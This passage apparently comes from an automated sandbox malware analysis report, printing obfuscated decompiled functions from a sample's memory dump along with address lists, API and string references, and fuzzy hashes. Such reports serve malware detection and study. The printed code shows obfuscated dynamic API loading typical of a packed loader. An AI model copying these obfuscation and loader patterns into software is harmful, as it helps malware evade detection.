0v>, xrefs: 004DDE00
Microsoft.Build.Engine.dll, xrefs: 004DDDF3
msobjs.dll, xrefs: 004DDC61
MW5, xrefs: 004DE014

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: ErrorLast
String ID: 0Lqt$0v>$CNHI06S.DLL$CoRevokeInitializeSpy$MW5$MXEAgent.dll$Microsoft.Build.Engine.dll$RtlSecondsSince1970ToTime$[/f$msobjs.dll$psapi.dll
API String ID: 1452528299-2135028804
Opcode ID: 8cf208adc17d5ae6380505b74277c072c7b5b04bb9bce30dda6298f45e849f97
Instruction ID: dd2e7f9bf9f44a9947f8067bd17ad0b651fe80896a4b4f27e0f157af1cd977fb
Opcode Fuzzy Hash: 8cf208adc17d5ae6380505b74277c072c7b5b04bb9bce30dda6298f45e849f97
Instruction Fuzzy Hash: 3EB19CB4E102099FDB00EFB9D8946EDBBB2EF29310F44407AD944E7352E3785A45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00463441 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 312
libraryCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00463441(signed int __edx, void* __edi) {
				signed int _t61;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				signed int _t68;
				struct HINSTANCE__* _t71;
				signed int _t78;
				signed int _t92;
				signed int _t93;
				signed int _t103;
				void* _t104;
				signed int _t107;
				char* _t114;
				char* _t118;
				signed int _t120;
				signed int _t124;
				void* _t125;
				signed int _t140;
				void* _t143;
				short _t144;
				intOrPtr _t148;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				void* _t179;
				short _t180;
				signed char _t181;
				short _t185;
				intOrPtr _t186;
				intOrPtr _t190;
				void* _t191;
				void* _t194;
				unsigned short _t198;
				void* _t201;
				void* _t206;
				void* _t224;

				_t191 = __edi;
				_t173 = __edx;
				_t140 = 0x4fff17;
				 *0x4fd1b0 = __edx;
				if(0x835db == 0x3876) {
					 *(_t206 - 0xc) = 0x835db;
				}
				if(0x835db != 0x835db) {
					L5:
					_t173 =  !_t173 +  !_t173;
					_t198 = 0;
				} else {
					_t140 = _t140 - 0x5fe2;
					if(_t140 >= _t140) {
						 *((intOrPtr*)(_t206 - 0x10)) =  *((intOrPtr*)(_t206 - 0x10)) + _t140;
						 *0x4fd180 = _t140;
						_t190 =  *0x4fd1b4; // 0x949c
						_t173 = _t190 - 0x806c41;
						goto L5;
					}
				}
				_push( *0x4fd032);
				_t61 =  *(_t206 - 8);
				 *0x4fd13a = _t140;
				if(_t140 != _t140) {
					_t140 = 0x828e;
					 *0x4fd1d4 = _t173;
					_t173 = _t173 - 0xad;
					if(_t191 > 0) {
						_t191 = _t191 - 0xe90d;
						 *0x4ffdc0 =  *0x4ffdc0 - _t191;
					}
				}
				if("msmpeg2adec.dll" <= 0x3ca3) {
				}
				 *(_t206 - 0xc) = _t140;
				_t143 = (_t140 ^ 0x0000640f) + 0x60d074;
				_t175 = _t173 - 0x842bbe;
				_push( *0x4fd0c4);
				 *0x4ff828 =  *0x4ff828 + _t198;
				_t103 =  *0x4fff1d; // 0x1
				_t194 =  !(_t191 - 0xcbd233) +  !(_t191 - 0xcbd233);
				 *(_t206 - 8) = _t61;
				if(_t61 == 0x2f) {
					L17:
					_t194 = _t194 - 1;
					_t61 = _t61 + 1;
				} else {
					_t103 = 0x466728;
					 *0x4fd112 =  *0x4fd112 - _t143;
					_t143 = 0x78;
					 *0x4fd1b0 = _t175;
					if((_t175 & 0x00008d93) == 0) {
						if((_t175 & 0x008d1dbe) <= 0) {
							_t175 = _t175 + 0xad1c;
							 *0x4fee57 =  *0x4fee57 - _t198;
						}
						_t198 = _t198 - 0xd488;
						 *0x4fff1d = _t61;
						goto L17;
					}
				}
				 *0x4fd68f = _t61;
				_t104 = _t103 + 1;
				 *0x4fde27 =  *0x4fde27 - _t104;
				_t144 = _t143 + _t143;
				 *0x4fd17e = _t144;
				_t63 =  *(_t206 - 8);
				_push( *0x4fd0e8);
				 *(_t206 - 8) = _t63;
				_t107 = _t104 + _t104 - 0xffffffffffffceba;
				if(_t107 < _t107) {
					 *(_t206 - 0xc) = _t107;
					 *(_t206 - 0xc) = _t107;
					 *0x4fd186 = 0x6949;
					_t198 = (_t198 >> 0x00006949 & 0x00a52422) + 0xac3666;
					_t93 = _t63;
					_t194 = 0xffffffffffff08cc;
					 *0x4fd4b7 = _t93;
					if((_t93 ^ 0x0000001c) != 0x1fb917) {
						_t107 = 0x2ddd9c;
					}
					 *0x4fdc43 = _t107;
					_t107 = 0x4a26a5;
					 *0x4fd156 = 0x6949;
					_t144 = 0x6e5482;
					_t175 = 0x7ba708;
					_t224 = 0x7ba708;
				}
				 *0x4fff17 =  *0x4fff17 - _t175;
				_t176 = _t175 & 0x0000009c;
				_t65 = E004F4B5F(_t107, _t144, _t176, _t224);
				if((_t176 & 0x008abad8) == 0) {
					 *0x4fff19 = _t65;
					_t198 = 0;
				}
				_t201 = _t198 + 0xc9fd;
				 *(_t206 - 8) = _t65;
				_t67 =  *(_t206 - 8);
				if(_t144 != _t144) {
					 *0x4fd15a = _t144;
				}
				 *(_t206 - 8) = _t67;
				if(_t67 >= 0x2f) {
				}
				 *0x4fd1ac =  *0x4fd1ac + 0x7d3b;
				_t179 = 0x22fd4;
				_t68 =  *(_t206 - 8);
				 *(_t206 - 0x28) = _t68;
				 *(_t206 - 8) = _t68;
				 *(_t206 - 8) = _t68;
				_push( *(_t206 - 0x28));
				_t148 =  *0x4fd188; // 0x647c
				_t114 = "MXEAgent.dll";
				if(_t114 >= _t114) {
					_t148 = 0x72b0;
				}
				 *0x4fe6e7 =  *0x4fe6e7 + _t179;
				_t180 = _t179 + _t179;
				_t71 = LoadLibraryA(??);
				 *(_t206 - 8) = _t71;
				if(_t71 > 0x2917cf) {
					if(_t114 == 0x3e) {
						L34:
						 *0x4fe733 =  *0x4fe733 - _t148;
						 *0x4fd1c2 = _t180;
						_t186 =  *0x4fd1f6; // 0x15c0
						 *0x4fd22a =  *0x4fd22a - _t186;
						 *0x4fee27 =  *0x4fee27 + _t201;
						_t201 = _t201 + _t201;
						goto L35;
					} else {
						 *0x4fd10e =  *0x4fd10e - _t148;
						if(_t148 <= _t148) {
							_t148 = 0x74c7;
							goto L34;
						}
					}
				}
				 *0x4fff1d =  *0x4fff1d + 0xd7;
				_t78 =  *(_t206 - 8);
				 *0x4fd3fb = _t78;
				_t181 =  *0x4fd218; // 0x6800
				 *0x4fff1b = _t78;
				 *(_t206 - 8) = _t78;
				_t118 = "ehshell.dll";
				if(_t118 == _t118) {
					 *(_t206 - 0xc) = _t118;
					 *0x4fff16 =  *0x4fff16 + 0x6824;
					 *0x4fd182 = 0x6824;
					if((_t181 & 0x0000008a) < 0) {
						_t185 = _t181 - 0x87d4c9;
						 *0x4feb23 =  *0x4feb23 + _t185;
						 *0x4fd21a = _t185;
						_t78 = _t78 - 0xc2;
					}
					 *0x4fff1d = _t78;
				}
				_push(0);
				_t120 =  *(_t206 - 0xc);
				 *0x4fd158 = 0x6364;
				if(_t120 < 0x2894a7) {
					_t120 = 0x3dcb6d;
					 *0x4fd10c =  *0x4fd10c + 0x3dcb6d;
				}
				_push(E004FD080);
				 *0x4fd178 = 0xffffffffffffff91;
				_t124 = _t120 + _t120 - E0046BD6E - 1;
				 *(_t206 - 0xc) = _t124;
				_t92 =  *(_t206 - 8);
				_push(E004FD080);
				 *(_t206 - 0xc) = _t124;
				if(0xcf24 < 0xcf24) {
				}
				 *0x4fd19e = 0x94ca;
				 *0x4fff19 = _t92;
				_t125 = _t124 - _t92;
				 *(_t206 - 8) = _t92;
				_push(_t125);
				_push(_t125);
				_push(E004638FA);
				_push(L0045F957);
				return _t92;
			}

0x00463441
0x00463441
0x0046344a
0x0046344b
0x0046346a
0x0046346c
0x0046346c
0x00463471
0x00463493
0x00463495
0x0046349f
0x00463473
0x00463473
0x0046347a
0x0046347c
0x0046347f
0x00463486
0x0046348d
0x00000000
0x0046348d
0x0046347a
0x004634a8
0x004634c4
0x004634c7
0x004634d1
0x004634d9
0x004634dd
0x004634e7
0x004634f2
0x004634f4
0x004634f9
0x004634f9
0x0046350b
0x0046351a
0x0046351a
0x00463521
0x00463530
0x00463534
0x0046353a
0x00463541
0x00463547
0x00463555
0x00463557
0x0046355c
0x004635a7
0x004635a7
0x004635a8
0x0046355e
0x00463564
0x00463569
0x00463575
0x00463578
0x00463584
0x0046358c
0x0046358e
0x00463593
0x00463593
0x0046359b
0x004635a0
0x00000000
0x004635a0
0x00463584
0x004635a9
0x004635b5
0x004635b6
0x004635be
0x004635c1
0x004635c8
0x004635cb
0x004635d5
0x004635d8
0x004635df
0x004635e1
0x004635e4
0x004635f2
0x0046360e
0x0046360f
0x00463613
0x00463618
0x00463625
0x00463627
0x00463627
0x0046362c
0x00463634
0x00463639
0x00463642
0x00463648
0x00463648
0x00463648
0x0046364e
0x00463654
0x0046365d
0x00463668
0x0046366a
0x00463670
0x00463670
0x00463672
0x00463677
0x0046367f
0x00463689
0x0046368b
0x0046368b
0x0046369c
0x004636a1
0x004636a1
0x004636bf
0x004636c8
0x004636ca
0x004636cd
0x004636d5
0x004636d8
0x004636e1
0x004636f2
0x00463705
0x0046370c
0x0046371b
0x0046371b
0x00463722
0x00463728
0x0046372a
0x00463730
0x00463738
0x0046373d
0x0046375b
0x0046375b
0x00463761
0x0046376b
0x00463772
0x00463779
0x0046377f
0x00000000
0x0046373f
0x00463745
0x0046374e
0x00463757
0x00000000
0x00463757
0x0046374e
0x0046373d
0x0046378a
0x004637a1
0x004637a4
0x004637a9
0x004637b0
0x004637be
0x004637c4
0x004637cc
0x004637ce
0x004637d8
0x004637de
0x004637e8
0x004637ea
0x004637f0
0x004637f6
0x004637ff
0x004637ff
0x00463802
0x0046380c
0x0046381e
0x0046382f
0x00463836
0x0046384b
0x00463853
0x00463858
0x00463858
0x00463866
0x00463870
0x00463898
0x0046389d
0x004638b3
0x004638b6
0x004638bd
0x004638c4
0x004638c4
0x004638ca
0x004638e2
0x004638e8
0x004638ea
0x004638ed
0x004638ee
0x004638ef
0x004638f4
0x004638f9

APIs

LoadLibraryA.KERNEL32(?), ref: 0046372A

Strings

MXEAgent.dll, xrefs: 004636AA
msmpeg2adec.dll, xrefs: 00463510
ehshell.dll, xrefs: 004637C4
MXEAgent.dll, xrefs: 00463705
(u=, xrefs: 0046351C
api-ms-win-core-libraryloader-l1-1-0.dll, xrefs: 0046379A
sh$, xrefs: 004636D0
RegQueryInfoKeyW, xrefs: 004638AE
RegQueryInfoKeyW, xrefs: 004634B6

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: LibraryLoad
String ID: (u=$MXEAgent.dll$MXEAgent.dll$RegQueryInfoKeyW$RegQueryInfoKeyW$api-ms-win-core-libraryloader-l1-1-0.dll$ehshell.dll$msmpeg2adec.dll$sh$
API String ID: 1029625771-2330716514
Opcode ID: 2cacc23f3ceb621a6b8a3f9f5a92b7e637d8df6334d68a670a4f5da5eb8f0926
Instruction ID: 8cdfbf46dd2ea1e29c81a8db385dfb2b3e703aa08248ef1cd347a8acebef63b8
Opcode Fuzzy Hash: 2cacc23f3ceb621a6b8a3f9f5a92b7e637d8df6334d68a670a4f5da5eb8f0926
Instruction Fuzzy Hash: 4DC1DE75E10245AFCB00EFB8E8942ED7BB2FF29324B04817AD945D7365E2380A65CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0048BC8D Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 205libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 0048BD88

Strings

imagesp1.dll, xrefs: 0048BE87
CreateActCtxW, xrefs: 0048BE1C, 0048BF7A
j4E, xrefs: 0048BD4C
MXEAgent.dll, xrefs: 0048BD04
KBDBGPH.DLL, xrefs: 0048BC9A
TpWaitForAlpcCompletion, xrefs: 0048BF00
RegQueryInfoKeyW, xrefs: 0048BD97, 0048BF13
msobjs.dll, xrefs: 0048BF4D
yv, xrefs: 0048BC8D

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: CreateActCtxW$KBDBGPH.DLL$MXEAgent.dll$RegQueryInfoKeyW$TpWaitForAlpcCompletion$imagesp1.dll$j4E$msobjs.dll$yv
API String ID: 190572456-1724770922
Opcode ID: f1353f355b3c5967941d2f80ed519d345e001aab1c0a68ff7b7785be00de179a
Instruction ID: 2ce3c41eb76a7c4247a6359c3b01279a17354e0b6f2ea4fb5cd519fa89165768
Opcode Fuzzy Hash: f1353f355b3c5967941d2f80ed519d345e001aab1c0a68ff7b7785be00de179a
Instruction Fuzzy Hash: C2818C75E1420AAFCB00EFB8E9D45EDBBB1EB29320F44817AD945E7351E3741554CB88

Uniqueness

Uniqueness Score: -1.00%

Function 004985B1 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 215
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E004985B1() {
				char* _t57;
				char* _t59;
				char* _t60;
				_Unknown_base(*)()* _t63;
				char* _t64;
				char* _t68;
				char* _t77;
				intOrPtr _t100;
				intOrPtr _t111;
				void* _t120;
				unsigned short _t143;
				unsigned short _t144;
				short _t147;
				void* _t161;
				void* _t162;
				void* _t165;
				signed int _t169;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t175;
				void* _t177;

				_t57 =  *(_t177 - 8);
				 *(_t177 - 0x20) = _t57;
				_t162 = _t161 + 0x8b;
				 *(_t177 - 8) = _t57;
				 *0x4fd0c0 =  *0x4fd0c0 + 0x2f027e;
				 *0x4fd172 = 0;
				_t143 =  *0x4fd1a2; // 0x5e
				 *0x4fff12 =  *0x4fff12 + 0xbc09f8;
				_t144 = _t143 >> _t143;
				_t59 =  *(_t177 - 8);
				_push( *(_t177 - 0x20));
				if(_t144 <= _t144) {
					if(_t144 < _t144) {
						 *((intOrPtr*)(_t177 - 0x10)) =  *((intOrPtr*)(_t177 - 0x10)) + _t144;
					}
					 *((intOrPtr*)(_t177 - 0x10)) =  *((intOrPtr*)(_t177 - 0x10)) - _t144;
					_t144 = _t144 - _t162;
				}
				 *0x4fff18 =  *0x4fff18 + _t162 + 0x85bd57;
				_t174 = _t173;
				 *0x4ff840 =  *0x4ff840 + _t174;
				 *0x4fff1d = _t59;
				_push( *0x4fd577);
				_t165 = 0xadd1;
				 *(_t177 - 8) = _t59;
				_t60 =  *(_t177 - 8);
				 *(_t177 - 8) = _t60;
				if(0 < 0) {
					 *((intOrPtr*)(_t177 - 0xc)) =  *((intOrPtr*)(_t177 - 0xc)) + _t144;
					 *0x4fd152 = _t144;
					_t144 =  *0x4fd186; // 0xefa2
					_t165 = 0x887b;
					 *0x4fff18 =  *0x4fff18 - 0x887b;
				}
				_t100 =  *((intOrPtr*)(_t177 - 0xc));
				 *0x4fd16e = _t144 - 0x58ece3;
				_t169 =  !(_t165 + _t165 + _t60 + 0x835a71);
				_t63 = GetProcAddress(??, ??);
				if((_t169 & 0x008b5c92) == 0) {
					 *0x4fece3 =  *0x4fece3 + _t169;
					 *0x4fd240 =  *0x4fd240 - _t174;
					_t100 = _t100 - _t63;
					_t174 = _t174 + _t174 + 0xd293;
					 *0x4fff1d =  &(( *0x4fff1d)[_t63]);
				}
				if(_t63 >= 0) {
					 *0x4fd51b =  *0x4fd51b + _t63;
					 *0x4fd647 = _t63;
					 *0x4fd7ff = _t63;
					_t100 = 0x305f14;
					 *0x4fff12 =  *0x4fff12 + 0x305f14;
				}
				 *(_t177 - 8) = _t63;
				_t64 =  *(_t177 - 8);
				 *0x4fe047 = _t64;
				_t175 = _t174 + _t174;
				 *0x4fff1d = _t64;
				_t172 = _t171 + 0xd4e2c6;
				 *(_t177 - 8) = _t64;
				_t147 = 0x4f77bb;
				_t111 = 0x2dfc2e;
				_t68 =  *(_t177 - 8);
				if(0x2dfc2e >= 0x2dfc2e) {
					_t111 =  *((intOrPtr*)(_t177 - 0xc));
					 *0x4fd16c = 0x6294;
					_t147 = 0;
					 *0x4fd208 = _t169;
				}
				 *(_t177 - 8) = _t68;
				_push(0);
				 *0x4fd146 = _t147;
				L00461400( &(( *(_t177 - 8))[_t111 + 0x442319 - 0x36ee2e]), _t111 + 0x442319 - 0x36ee2e, _t147, _t169, _t172, _t175, 1);
				 *((intOrPtr*)(_t177 - 0xc)) = "mtxclu.dll";
				_push( *0x4fd0d4);
				_t77 =  *(_t177 - 8);
				_t120 = ("TpWaitForAlpcCompletion" >> 0x17fac) + ("TpWaitForAlpcCompletion" >> 0x17fac);
				if(_t120 != _t120) {
					 *0x4fd10a =  *0x4fd10a - _t120;
				}
				 *(_t177 - 8) = _t77;
				 *0x4fddaf = _t120 + 0x3d;
				_push( *0x4fd018);
				_push( *0x4fd032);
				 *(_t177 - 8) = "MXEAgent.dll";
				_push(E004FD080);
				 *(_t177 - 8) =  &(( *(_t177 - 8))["scavengeui.dll"]);
				 *0x4fff12 =  *0x4fff12 - 0 - 0x2c55;
				_push(0xffffffffffffd3ab);
				_push(1);
				_push(E004988D8);
				goto __ebx;
			}

0x004985ba
0x004985c2
0x004985cb
0x004985ce
0x004985d6
0x004985e8
0x004985f2
0x004985fc
0x0049860e
0x00498611
0x00498614
0x00498619
0x0049861d
0x0049861f
0x0049861f
0x00498622
0x00498625
0x00498625
0x0049862e
0x00498637
0x0049863d
0x00498643
0x00498648
0x0049864e
0x00498652
0x00498657
0x0049865f
0x0049866b
0x00498672
0x00498675
0x0049867f
0x00498686
0x0049868a
0x0049868a
0x004986b1
0x004986ba
0x004986ce
0x004986d0
0x004986dc
0x004986de
0x004986e4
0x004986eb
0x004986ef
0x004986f4
0x004986f4
0x004986fc
0x00498708
0x0049870e
0x00498713
0x0049871b
0x00498720
0x00498728
0x0049872a
0x00498738
0x0049873b
0x00498740
0x00498748
0x0049874f
0x00498757
0x00498766
0x0049877b
0x00498780
0x00498785
0x00498789
0x00498790
0x00498797
0x004987a1
0x004987a1
0x004987a8
0x004987ca
0x004987cc
0x004987dd
0x004987e7
0x0049880a
0x00498821
0x00498824
0x00498829
0x0049882b
0x0049882b
0x00498835
0x00498840
0x00498849
0x00498875
0x0049887c
0x004988a6
0x004988ad
0x004988c3
0x004988c9
0x004988ca
0x004988cc
0x004988d6

APIs

GetProcAddress.KERNEL32(?), ref: 004986D0

Strings

MXEAgent.dll, xrefs: 00498870
0oy, xrefs: 004987CC
KBDBGPH.DLL, xrefs: 00498662
TpWaitForAlpcCompletion, xrefs: 00498811
mtxclu.dll, xrefs: 004987E2, 0049888A
scavengeui.dll, xrefs: 0049888F, 004988C9
ehshell.dll, xrefs: 004986AA
RegQueryInfoKeyW, xrefs: 0049875A, 004987F7

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: 0oy$KBDBGPH.DLL$MXEAgent.dll$RegQueryInfoKeyW$TpWaitForAlpcCompletion$ehshell.dll$mtxclu.dll$scavengeui.dll
API String ID: 190572456-2579723312
Opcode ID: 6dac283b3c7de87d28e493174abe5c5bc4296306ec46eb988f53d8a8e944bb7d
Instruction ID: 140f2b0fdcb1ebe1734833121939c24d8a4bdff11df978a720d4c880adbf73a4
Opcode Fuzzy Hash: 6dac283b3c7de87d28e493174abe5c5bc4296306ec46eb988f53d8a8e944bb7d
Instruction Fuzzy Hash: EC816A75E543099FCB009FB8E8D06EDBBB1EB19324F04817ADA45E7352E7780A59CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0046E9A2 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 199libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 0046EB58

Strings

imagesp1.dll, xrefs: 0046EA78
MXEAgent.dll, xrefs: 0046E9FA
KBDBGPH.DLL, xrefs: 0046EC69
sspicli.dll, xrefs: 0046EA8B
LogonUserExA, xrefs: 0046EB85
deskperf.dll, xrefs: 0046EBD1
RegQueryInfoKeyW, xrefs: 0046E9B6
msobjs.dll, xrefs: 0046EA34

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: KBDBGPH.DLL$LogonUserExA$MXEAgent.dll$RegQueryInfoKeyW$deskperf.dll$imagesp1.dll$msobjs.dll$sspicli.dll
API String ID: 190572456-4209483903
Opcode ID: 875220b9e8235108a0ce0dfe50f5e67905c8dcfcac08acd3b6c641f42680ee1b
Instruction ID: 4d617630ff5211a7040225e52f906eba6eb71687a02de75f01cdf8c74fdad617
Opcode Fuzzy Hash: 875220b9e8235108a0ce0dfe50f5e67905c8dcfcac08acd3b6c641f42680ee1b
Instruction Fuzzy Hash: 6F71F179E043458FCB00DF79E9942E93BB2EF2A324B04407BC94497362F2780669CB1E

Uniqueness

Uniqueness Score: -1.00%

Function 004C77BD Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 190COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,?,?), ref: 004C7915

Strings

manage-bde.exe, xrefs: 004C789B
w32tm.exe, xrefs: 004C78AC
CNHI06S.DLL, xrefs: 004C7932
api-ms-win-core-libraryloader-l1-1-0.dll, xrefs: 004C7A5D
]6(, xrefs: 004C79B1
mtxclu.dll, xrefs: 004C78F7
RtlSecondsSince1970ToTime, xrefs: 004C78EA
rdpwsx.dll, xrefs: 004C79CD

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: CreateWindow
String ID: CNHI06S.DLL$RtlSecondsSince1970ToTime$]6($api-ms-win-core-libraryloader-l1-1-0.dll$manage-bde.exe$mtxclu.dll$rdpwsx.dll$w32tm.exe
API String ID: 716092398-953489217
Opcode ID: d5c025afed2d180a8e43354fefed3a975fd3f7155ed5dd18e292e66887be5435
Instruction ID: 24f316eb622a5918ed38c7ba19dddf0379141f6c1c4c19befaefa25936ba52ae
Opcode Fuzzy Hash: d5c025afed2d180a8e43354fefed3a975fd3f7155ed5dd18e292e66887be5435
Instruction Fuzzy Hash: 3B61F469A442458FCB00DFB9EC947E93FB2EB3A310B04417FDA4497366E2750A19CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 0047E98F Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 190
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E0047E98F(void* __eax, void* __edx, void* __edi, void* __esi) {
				char* _t43;
				char* _t45;
				_Unknown_base(*)()* _t48;
				char* _t49;
				char* _t53;
				char* _t55;
				char* _t61;
				char _t65;
				void* _t76;
				signed int _t77;
				signed int _t78;
				short _t102;
				void* _t103;
				short _t108;
				void* _t120;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;
				void* _t132;
				void* _t133;
				void* _t138;

				_t132 = __esi;
				_t127 = __edi;
				 *(_t138 - 8) = __eax + 0x4fff11;
				_t43 =  *(_t138 - 8);
				 *(_t138 - 0x20) = _t43;
				_t118 = __edx + 1;
				 *(_t138 - 8) = _t43;
				_t101 =  !0x69e8;
				 *0x4fd19e = _t118;
				 *0x4fff12 =  *0x4fff12 + 0x2e6c8e;
				_t45 =  *(_t138 - 8);
				_push( *(_t138 - 0x20));
				if( !0x69e8 <  !0x69e8) {
					L3:
					 *0x4fff19 = _t45;
					L4:
					_t76 = 0xce;
					_t128 = _t127 + 1;
					 *0x4ffb88 =  *0x4ffb88 - _t128;
					_t129 = _t128 + _t128;
					_push( *0x4fd663);
					 *0x4fd2dd =  *0x4fd2dd + _t132;
					_t133 = _t132 + _t129;
					 *(_t138 - 8) = _t45;
					if(_t45 == 0x2f03) {
						L9:
						L10:
						_t77 = _t76 + 0x3fd3;
						 *0x4fff14 =  *0x4fff14 + _t77;
						_t78 = _t77 & 0x00004f98;
						_t102 =  *0x4fd12e; // 0x79e0
						 *0x4fd17e = _t102;
						_t103 = _t102 - _t118;
						_t48 = GetProcAddress(??, ??);
						_t120 = 0x961b89;
						 *0x4fff1b = _t48;
						 *(_t138 - 8) = _t48;
						_t49 = E004622AA(_t48, _t78, _t103, 0x961b89, _t129, _t133 + 1, _t78);
						if(_t78 < 0x35) {
							L13:
							_t120 = 0xaa80;
							 *0x4fff19 = _t49;
							_t49 = 0xd5;
							 *0x4ffa4c =  *0x4ffa4c - _t129;
							 *0x4fff1d = 0xd5;
							L14:
							_t130 = _t129 - 0xf958;
							 *0x4fd044 =  *0x4fd044 - 6;
							_t53 =  *(_t138 - 8);
							 *0x4fd8ab = _t53;
							 *(_t138 - 8) = _t53;
							 *(_t138 - 8) = 0xa0;
							_t55 =  *(_t138 - 8);
							if(0x175b75a == 0x175b75a) {
								L17:
								_t120 = _t120 + 0x959861;
								 *0x4fff19 =  *0x4fff19 - _t55;
								_t85 = 0xea;
								if(_t130 < 0) {
									L21:
									 *(_t138 - 0xc) =  &(( *(_t138 - 0xc))[_t85]);
									_push(0);
									_t108 =  *0x4fd19e; // 0x1d10
									 *(_t138 - 8) = _t55;
									if(_t85 <= 0x2743db) {
										_t85 = 0x438ce4;
										 *(_t138 - 0xc) = 0x438ce4;
										 *0x4fd122 = _t108;
									}
									_push( *0x4fd206);
									 *0x4fd12a = _t108 - 0x74;
									 *(_t138 - 0xc) = "sspicli.dll";
									_push(E0047EC65);
									_push(L0045EEBA);
									return "CreateActCtxW";
								}
								 *0x4fff11 =  *0x4fff11 + _t55;
								_t85 = _t55;
								L19:
								if(_t85 < 0x2c765f) {
									_t85 =  &(_t85[0x3a9ae3]);
								}
								goto L21;
							}
							_t85 = "scavengeui.dll";
							if(_t103 == _t103) {
								goto L19;
							}
							 *0x4fd1cc = 0x8742;
							_t120 = 0x10e84;
							goto L17;
						}
						_t103 = 0x7b32;
						if(0xb10 == 0) {
							goto L14;
						}
						goto L13;
					}
					_t76 = 0x4d8535;
					 *(_t138 - 0xc) =  *(_t138 - 0xc) - _t101;
					_t118 = 0x85bd;
					if(0x90 != 0) {
						goto L10;
					}
					_t118 = 0xffffffffffffe076;
					_t61 = _t45;
					if(_t61 <= 0) {
						_t65 = _t61 - 0xd8;
						 *0x4fff1d = _t65;
						 *0x4fff1e = _t65;
					}
					goto L9;
				}
				_t101 = 0xbadb37;
				 *0x4fd1a6 = _t118;
				if((_t118 & 0x007d2546) < 0) {
					goto L4;
				}
				_t118 =  !(_t118 + 0x9e);
				goto L3;
			}

0x0047e98f
0x0047e98f
0x0047e994
0x0047e99b
0x0047e99e
0x0047e9a7
0x0047e9a8
0x0047e9c4
0x0047e9c6
0x0047e9d5
0x0047e9e4
0x0047e9e7
0x0047e9ed
0x0047ea09
0x0047ea09
0x0047ea11
0x0047ea11
0x0047ea13
0x0047ea14
0x0047ea1a
0x0047ea1c
0x0047ea22
0x0047ea29
0x0047ea2b
0x0047ea32
0x0047ea82
0x0047ea87
0x0047ea87
0x0047ea8c
0x0047ea92
0x0047ea9b
0x0047eaa2
0x0047eaa9
0x0047eab0
0x0047eab6
0x0047eabd
0x0047eac3
0x0047eac7
0x0047eacf
0x0047eaf7
0x0047eafc
0x0047eb00
0x0047eb0e
0x0047eb10
0x0047eb16
0x0047eb1b
0x0047eb1d
0x0047eb24
0x0047eb2b
0x0047eb2e
0x0047eb35
0x0047eb3e
0x0047eb46
0x0047eb4f
0x0047eb72
0x0047eb72
0x0047eb7c
0x0047eb8c
0x0047eb90
0x0047ebb2
0x0047ebb2
0x0047ebc3
0x0047ebca
0x0047ebde
0x0047ebe7
0x0047ebef
0x0047ebf4
0x0047ebf7
0x0047ebf7
0x0047ec14
0x0047ec1b
0x0047ec3a
0x0047ec5a
0x0047ec5f
0x0047ec64
0x0047ec64
0x0047eb9c
0x0047eba2
0x0047eba4
0x0047ebaa
0x0047ebac
0x0047ebac
0x00000000
0x0047ebaa
0x0047eb51
0x0047eb58
0x00000000
0x00000000
0x0047eb68
0x0047eb6f
0x00000000
0x0047eb6f
0x0047eae8
0x0047eaf2
0x00000000
0x00000000
0x00000000
0x0047eaf2
0x0047ea3c
0x0047ea41
0x0047ea4d
0x0047ea54
0x00000000
0x00000000
0x0047ea59
0x0047ea5e
0x0047ea62
0x0047ea64
0x0047ea67
0x0047ea6c
0x0047ea71
0x00000000
0x0047ea7d
0x0047e9f2
0x0047e9f5
0x0047ea02
0x00000000
0x00000000
0x0047ea07
0x00000000

APIs

GetProcAddress.KERNEL32(?), ref: 0047EAB0

Strings

CreateActCtxW, xrefs: 0047EC49
MXEAgent.dll, xrefs: 0047E9B0
CNHI06S.DLL, xrefs: 0047EA78
sspicli.dll, xrefs: 0047EC35
scavengeui.dll, xrefs: 0047EB51
_v,, xrefs: 0047EBA4
msobjs.dll, xrefs: 0047EAD6
yv, xrefs: 0047EA9B

Memory Dump Source

